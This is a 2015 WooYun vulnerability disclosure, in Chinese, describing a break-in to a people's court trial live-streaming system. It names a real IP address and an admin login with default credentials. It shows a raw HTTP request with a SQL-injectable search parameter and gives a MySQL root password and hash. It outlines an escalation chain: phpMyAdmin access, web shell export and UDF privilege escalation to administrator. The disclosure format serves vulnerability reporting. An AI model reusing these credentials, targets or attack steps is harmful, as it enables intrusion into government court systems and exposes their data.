当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135527

漏洞标题:某人民法院庭审直播系统成功入侵(漏洞打包)

相关厂商:公安部一所

漏洞作者: Teris

提交时间:2015-08-21 09:17

修复时间:2015-08-26 09:18

公开时间:2015-08-26 09:18

漏洞类型:后台弱口令

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-21: 细节已通知厂商并且等待厂商处理中
2015-08-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某人民法院庭审直播系统成功入侵,并未深入,发现已经有人入侵过并上传了刷流量软件

详细说明:

http://221.193.221.207/admin/index.php?controller=AdminLogin&action=login
admin admin

QQ20150821-1@2x.png


POST /admin/index.php?controller=fileView&action=searchMovie&type=bigsearch HTTP/1.1
Host: 221.193.221.207
Proxy-Connection: keep-alive
Content-Length: 63
Accept: */*
Origin: http://221.193.221.207
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://221.193.221.207/admin/index.php?controller=fileView&action=index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=5e1eo7e98brf36i911lrn53d51
searchclass=&searchtype=&searchareas=&searchyears=&searchtext=1
searchtext 存在注入 获取root 账号密码
root *5B5DA141A52B1362FAFB16F22A6C2AB65FD877C3
破解后 登陆 phpmyadmin
http://221.193.221.207/phpmyadmin/
根据@@basedir 猜测到绝对路径
C:\APM\htdocs\
导出shell
root udf提权 直接管理员权限
http://221.193.221.207/t.php
<T>MYSQL</T>
<H>localhost</H>
<U>root</U>
<P>1980root</P>
<L>utf8</L>
导出udf

漏洞证明:

1111111.png


还有个账户ASP.NET是别人添加的 明显是被搞了
这个账户的桌面放着各种刷流量的工具 你们记得删了

修复方案:

版权声明:转载请注明来源 Teris@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-26 09:18

厂商回复:

最新状态:

暂无


漏洞评价:

评论